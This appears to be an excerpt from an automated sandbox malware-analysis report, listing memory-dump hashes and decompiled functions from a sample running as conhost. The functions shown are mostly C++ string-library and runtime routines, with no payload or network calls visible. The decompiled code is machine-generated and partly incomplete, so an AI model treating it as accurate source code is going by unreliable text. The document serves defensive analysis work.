                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: strlen
                        • String ID: _GLOBAL_
                        • API String ID: 39653677-770460502
                        • Opcode ID: 2e03a71ffbb1b7018c88c7eb3eef0ff1febdb7a68f7cec7d988261e03cd7fce3
                        • Instruction ID: 9044a41780077864397c6fb07c412a75a93e6c18b3160cf321aa1ebd0c7b52f5
                        • Opcode Fuzzy Hash: 2e03a71ffbb1b7018c88c7eb3eef0ff1febdb7a68f7cec7d988261e03cd7fce3
                        • Instruction Fuzzy Hash: 3BD10336A086D689FB708B6598163FE3BA9EB0978CF444071DE5DAB789CF3C9546C700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4e03036d182d164cb470424b579f1f0aeffcd990de4ee17112ff7d9909a462c5
                        • Instruction ID: fa308737ae9dae42f54fb0088ab1034f46f5b1186f309a60f8a617b53436770d
                        • Opcode Fuzzy Hash: 4e03036d182d164cb470424b579f1f0aeffcd990de4ee17112ff7d9909a462c5
                        • Instruction Fuzzy Hash: B091C676E1928646E7758F25C5023796A99FB09B94F158272CE2DEB3C8DE3CF841C740
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dea3cf285f77b3662a544ef16324cd2b14bec5ba05b93c8c5b0ed29a3849d8e7
                        • Instruction ID: 953e5edb8f68d549bee76cec28b8474d9e768877ddebd9fe0d1028bfdb95d913
                        • Opcode Fuzzy Hash: dea3cf285f77b3662a544ef16324cd2b14bec5ba05b93c8c5b0ed29a3849d8e7
                        • Instruction Fuzzy Hash: 0F91C772E0928286E7759F29810233B679DFB49B94F548272CE29A77C4DF3DE8418742
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935E8F80(void* __eflags, long long* __rcx, signed char* __rdx, long long __r8) {
                        				long long _v32;
                        				signed int _t6;
                        				long long _t15;
                        
                        				_t15 = __rcx + 0x10;
                        				 *__rcx = _t15;
                        				if (__eflags == 0) goto 0x935e8fa5;
                        				if (__rdx == 0) goto 0x935e9014;
                        				_v32 = __r8;
                        				if (__r8 - 0xf > 0) goto 0x935e8fe0;
                        				if (__r8 != 1) goto 0x935e8fd0;
                        				_t6 =  *__rdx & 0x000000ff;
                        				 *(__rcx + 0x10) = _t6;
                        				 *((long long*)(__rcx + 8)) = __r8;
                        				 *((char*)(_t15 + __r8)) = 0;
                        				return _t6;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: basic_string::_M_construct null not valid
                        • API String ID: 0-3522614731
                        • Opcode ID: 2d555e2d65516287e4ba4df9a30baac1f6735f76fb3a163cd8c5699a55140ec5
                        • Instruction ID: 9080fd1200ec80f54c0a025b621ded2df11fcf9d2706b9479ce32405664fd804
                        • Opcode Fuzzy Hash: 2d555e2d65516287e4ba4df9a30baac1f6735f76fb3a163cd8c5699a55140ec5
                        • Instruction Fuzzy Hash: 87511866A09B5191EB309F16E4021BDB7A9EB4DFD4F4841B1DE9CA7799CE3CD582C300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935E7CB0(long long* __rcx, intOrPtr* __rdx, long long __r8, void* __r9) {
                        				void* _t3;
                        				long long* _t7;
                        
                        				_t7 = __rcx;
                        				_t9 =  *__rdx;
                        				_t16 =  *((intOrPtr*)( *__rdx - 0x18));
                        				if (__r8 -  *((intOrPtr*)( *__rdx - 0x18)) > 0) goto 0x935e7ce2;
                        				r9d = 0;
                        				_t3 = E00007FF67FF6935E5F50(__r8, _t9 + __r8, _t9 + _t16);
                        				 *_t7 = __r8;
                        				return _t3;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
                        • API String ID: 0-1533248280
                        • Opcode ID: 7e988ea75a420e46f3efdbfbbdb68b2998f8cf7dbfdfae6fa6859e295e43672e
                        • Instruction ID: 642b6ea9dfab650ef6a62c401a9d8ac3b75110263dfb76ce216ed42e9679ee51
                        • Opcode Fuzzy Hash: 7e988ea75a420e46f3efdbfbbdb68b2998f8cf7dbfdfae6fa6859e295e43672e
                        • Instruction Fuzzy Hash: DB4127A2F0674591EF319B61E45A3BD6398EB6CBC8F444071DE0C6B3A5EE2CC595C380
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935E82D0(long long* __rcx, intOrPtr* __rdx, long long __r8, void* __r9) {
                        				void* _t3;
                        				long long* _t7;
                        
                        				_t7 = __rcx;
                        				_t9 =  *__rdx;
                        				_t16 =  *((intOrPtr*)( *__rdx - 0x18));
                        				if (__r8 -  *((intOrPtr*)( *__rdx - 0x18)) > 0) goto 0x935e8302;
                        				r9d = 0;
                        				_t3 = E00007FF67FF6935E5F50(__r8, _t9 + __r8, _t9 + _t16);
                        				 *_t7 = __r8;
                        				return _t3;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_S_construct null not valid$basic_string::basic_string
                        • API String ID: 0-1533248280
                        • Opcode ID: 4f257e8eea9157a3d96d25ff752e029291c5207e82449faa54e08378e86be904
                        • Instruction ID: a5b2ee8911e7da0ac895e58eed6b8be65988fa6ce3835757e131a34b013c0c4f
                        • Opcode Fuzzy Hash: 4f257e8eea9157a3d96d25ff752e029291c5207e82449faa54e08378e86be904
                        • Instruction Fuzzy Hash: BB4112A2F0674591EE309B61E8563BD6398EB6CFC8F444071DE4C6B396EE2CD895C380
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E00007FF67FF6935EB4A0(intOrPtr* __rcx, void* __rdx, intOrPtr* __r8) {
                        				long long _v24;
                        				void* _t5;
                        				void* _t6;
                        
                        				if (__rdx -  *__rcx -  *((intOrPtr*)(__rcx + 8)) > 0) goto 0x935eb4ca;
                        				_v24 =  *((intOrPtr*)(__r8 + 8));
                        				r8d = 0;
                        				return E00007FF67FF6935EA150(_t5, _t6, __rcx, __rdx -  *__rcx,  *((intOrPtr*)(__r8 + 8)),  *__r8);
                        			}

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy$strlen
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert$basic_string::replace
                        • API String ID: 2619041689-3628603605
                        • Opcode ID: 8f309133e528bfb8a631c1d82b6f70a6350f78bbf3e98dc5030f9ab0ab73fada
                        • Instruction ID: 2641901604348d406744e3905796ade3cf65cc4deae59f85047794143c4730ef
                        • Opcode Fuzzy Hash: 8f309133e528bfb8a631c1d82b6f70a6350f78bbf3e98dc5030f9ab0ab73fada
                        • Instruction Fuzzy Hash: 03412762E0968691EA30EB65D8129BD33A8FB1DBC4F844076ED0CB3761EE6CD155D300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E00007FF67FF6935EE670(intOrPtr* __rcx, void* __rdx, intOrPtr* __r8) {
                        				long long _v24;
                        				void* _t5;
                        				void* _t6;
                        
                        				if (__rdx -  *__rcx >> 1 -  *((intOrPtr*)(__rcx + 8)) > 0) goto 0x935ee69d;
                        				_v24 =  *((intOrPtr*)(__r8 + 8));
                        				r8d = 0;
                        				return E00007FF67FF6935ED220(_t5, _t6, __rcx, __rdx -  *__rcx >> 1,  *((intOrPtr*)(__r8 + 8)),  *__r8);
                        			}

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy$wcslen
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert$basic_string::replace
                        • API String ID: 1844840824-3628603605
                        • Opcode ID: 6fe8f4218b3338248ec7482308bc08983a46f8b89ad32865e54b27b11b18f773
                        • Instruction ID: 3d83d9637475c169a9f1fcab677aacbba282c2c8e11cce2e99e6dff05195b142
                        • Opcode Fuzzy Hash: 6fe8f4218b3338248ec7482308bc08983a46f8b89ad32865e54b27b11b18f773
                        • Instruction Fuzzy Hash: 46414892E19A8291EA30DB26D8025BD2359FB5DBC4F849472EE0CA3751FE2CD255D300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
                        • API String ID: 3510742995-4063909124
                        • Opcode ID: f23f27cd75e7038fd93b8e4d6321b72cf5f1972dcdcf113a62a095ed471e35e9
                        • Instruction ID: 6a9fa769cad16f59ce306065c94c89312482de176c1508d3f6031740b9dc2510
                        • Opcode Fuzzy Hash: f23f27cd75e7038fd93b8e4d6321b72cf5f1972dcdcf113a62a095ed471e35e9
                        • Instruction Fuzzy Hash: 4441D3A2B28B96A0DA30DF59C4064BD2368FB4DBC0B858572DE5DA7391DF3CE545C700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
                        • API String ID: 3510742995-4063909124
                        • Opcode ID: 71592ad96ff82efb201a7f99c5c042052940edf3ed562ae9d1175999a64afd26
                        • Instruction ID: 6d78de5692af92be6a7530dc956753bdef579cd31cdd24687114c424f4c5d344
                        • Opcode Fuzzy Hash: 71592ad96ff82efb201a7f99c5c042052940edf3ed562ae9d1175999a64afd26
                        • Instruction Fuzzy Hash: B54128A7B0D78A91DA30DB19D85A57D33A8FB5ABD5F8440B1DD5DA3391DE2CE141C300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935E7010(intOrPtr* __r8, void* __r9, intOrPtr _a40) {
                        				void* _t8;
                        				void* _t22;
                        				intOrPtr* _t25;
                        				char* _t27;
                        				int _t28;
                        				int _t30;
                        				intOrPtr _t40;
                        				void* _t47;
                        				intOrPtr _t49;
                        
                        				_t40 =  *((intOrPtr*)( *__r8 - 0x18));
                        				_t47 =  >  ? _a40 : _t40 - __r9;
                        				if (__r9 - _t40 > 0) goto 0x935e7042;
                        				goto 0x935e6e70;
                        				_t27 = "basic_string::insert";
                        				_t25 = "%s: __pos (which is %zu) > this->size() (which is %zu)";
                        				E00007FF67FF6935F0580(_t8, __r9 - _t40, __r9, _t25, _t27, __r9,  *__r8 + __r9);
                        				_t49 =  *((intOrPtr*)( *_t25 - 0x18));
                        				if (_t27 - _t49 > 0) goto 0x935e70e0;
                        				if (__r9 - 0xfffffff9 - _t49 > 0) goto 0x935e70f6;
                        				r8d = 0;
                        				E00007FF67FF6935E78B0(_t25, _t27, __r9, __r9);
                        				if (__r9 == 0) goto 0x935e70bc;
                        				if (__r9 == 1) goto 0x935e70d0;
                        				return memset(_t22, _t30, _t28);
                        			}

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memset
                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
                        • API String ID: 2221118986-1339558951
                        • Opcode ID: 3680cf383b4ab3b4de776d973a36cc2fd91093533bbd7946157c72e6f439be4e
                        • Instruction ID: 798d38a065744161b958cde5659b2e9e277720b0315a754019b11c05357d7aa8
                        • Opcode Fuzzy Hash: 3680cf383b4ab3b4de776d973a36cc2fd91093533bbd7946157c72e6f439be4e
                        • Instruction Fuzzy Hash: A231346AF0978651EA309B1AE8069B92358EB4DBE0F884571DF1CA33A1ED3CE581C340
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy$wcslen
                        • String ID: basic_string::append
                        • API String ID: 1844840824-3811946249
                        • Opcode ID: 6d1423d8eca0eb64354be2ec5ad14ebe267e54a2fe555800d2c3f9ce1365c203
                        • Instruction ID: e32338bfd297c6a91368c499a97016c7cb89643b5e27de57d2c36c9cd4a43f0d
                        • Opcode Fuzzy Hash: 6d1423d8eca0eb64354be2ec5ad14ebe267e54a2fe555800d2c3f9ce1365c203
                        • Instruction Fuzzy Hash: 99319DA6B09A4592EA30DB16C40A6BE2369FB49BC4FC98572DE5DA73D0EF3CD445D300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • malloc.MSVCRT(?,?,FFFFFFFF,00007FF6935E6469,?,?,FFFFFFFF,00007FF6935E5EE5,?,00000000,basic_string::_M_create,00007FF6935E9481), ref: 00007FF6935F0C04
                          • Part of subcall function 00007FF6935F0CD0: malloc.MSVCRT(?,?,?,?,00007FF6935F16E5,?,?,?,?,00007FF6935C34A4), ref: 00007FF6935F0CE1
                        • malloc.MSVCRT(?,?,?,?,?,?,?,00007FF6935E6469,?,?,FFFFFFFF,00007FF6935E5EE5,?,00000000,basic_string::_M_create,00007FF6935E9481), ref: 00007FF6935F0C6A
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: malloc
                        • String ID: basic_string::_M_create
                        • API String ID: 2803490479-3122258987
Uniqueness Score: -1.00%

                        Similarity
                        • API ID: memcpy$strlen
                        • String ID: basic_string::append
                        • API String ID: 2619041689-3811946249
Uniqueness Score: -1.00%

                        C-Code - Quality: 31%
                        			E00007FF67FF6935E78B0(long long* __rcx, void* __rdx, void* __r8, void* __r9) {
                        				void* _v73;
                        				void* _t16;
                        				intOrPtr _t23;
                        				intOrPtr _t24;
                        				long long* _t25;
                        				long long _t37;
                        				intOrPtr _t38;
                        				long long _t45;
                        
                        				_t23 =  *((intOrPtr*)(__rcx));
                        				_t38 =  *((intOrPtr*)(_t23 - 0x18));
                        				_t25 = __rcx;
                        				_t37 = __r9 - __r8 + _t38;
                        				if (_t37 -  *((intOrPtr*)(_t23 - 0x10)) > 0) goto 0x935e78fb;
                        				if ( *((intOrPtr*)(_t23 - 8)) <= 0) goto 0x935e7990;
                        				_t24 =  *((intOrPtr*)(__rcx));
                        				E00007FF67FF6935E6400(_t16, _t37,  *((intOrPtr*)(_t24 - 0x10)));
                        				if (__rdx == 0) goto 0x935e7930;
                        				_t8 = _t24 + 0x18; // 0x18
                        				_t45 = _t8;
                        				if (__rdx == 1) goto 0x935e79d0;
                        				memcpy(??, ??, ??);
                        				if (_t38 - __r8 + __rdx != 0) goto 0x935e7970;
                        				asm("lock xadd [ecx-0x8], eax");
                        				if (0xffffffff <= 0) goto 0x935e79c0;
                        				 *_t25 = _t45;
                        				 *((intOrPtr*)(_t45 - 8)) = 0;
                        				 *((long long*)(_t45 - 0x18)) = _t37;
                        				 *((char*)(_t45 + _t37)) = 0;
                        				return 0xffffffff;
			}

                        Similarity
                        • API ID: memcpy
                        • String ID: basic_string::_M_create
                        • API String ID: 3510742995-3122258987
Uniqueness Score: -1.00%

                        C-Code - Quality: 46%
                        			E00007FF67FF6935E6AA0(intOrPtr* __rcx, void* __rdx, void* __r8) {
                        				intOrPtr _t15;
                        				void* _t18;
                        
                        				_t15 =  *__rcx;
                        				_t18 = __r8;
                        				if (__r8 - 0xfffffff9 > 0) goto 0x935e6bb5;
                        				if (_t15 - __rdx > 0) goto 0x935e6af0;
                        				if (_t15 +  *((intOrPtr*)(_t15 - 0x18)) - __rdx < 0) goto 0x935e6af0;
                        				if ( *((intOrPtr*)(_t15 - 8)) <= 0) goto 0x935e6b28;
                        				E00007FF67FF6935E78B0(__rcx, _t15 +  *((intOrPtr*)(_t15 - 0x18)),  *((intOrPtr*)( *__rcx - 0x18)), __r8);
                        				if (_t18 == 0) goto 0x935e6b17;
                        				if (_t18 == 1) goto 0x935e6b70;
                        				return memcpy(??, ??, ??);
			}

                        Similarity
                        • API ID: memcpy
                        • String ID: basic_string::assign
                        • API String ID: 3510742995-2385367300
Uniqueness Score: -1.00%

                        Similarity
                        • API ID: Byte$CharLeadMultiWide
                        • String ID:
                        • API String ID: 2561704868-0
Uniqueness Score: -1.00%

                        Similarity
                        • API ID: Process$AffinityCurrentMask
                        • String ID:
                        • API String ID: 1231390398-0
Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935CDBF0(void* __eax) {
                        				intOrPtr _t4;
                        
                        				_t4 =  *0x936020e0; // 0x1
                        				if (_t4 == 0) goto 0x935cdc20;
                        				return __eax;
			}

                        APIs
                        • VirtualProtect.KERNEL32(00007FF693602088,00007FF898063CA0,?,?,?,00000001,00007FF6935C1261), ref: 00007FF6935CDD95
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                        • API String ID: 544645111-395989641
Uniqueness Score: -1.00%

                        C-Code - Quality: 69%
                        			E00007FF67FF6935D04D0(void* __rcx) {
                        				void* _t29;
                        				intOrPtr _t39;
                        				intOrPtr _t52;
                        				intOrPtr _t53;
                        				intOrPtr _t55;
                        				intOrPtr _t56;
                        				intOrPtr _t57;
                        				intOrPtr _t59;
                        				intOrPtr _t60;
                        				intOrPtr _t64;
                        				void* _t68;
                        				void* _t76;
                        				intOrPtr* _t80;
                        				intOrPtr* _t81;
                        				intOrPtr* _t82;
                        				void* _t89;
                        
                        				if (__rcx == 0) goto 0x935d06d0;
                        				_t80 =  *0x935f8900; // 0x7ff6936023e0
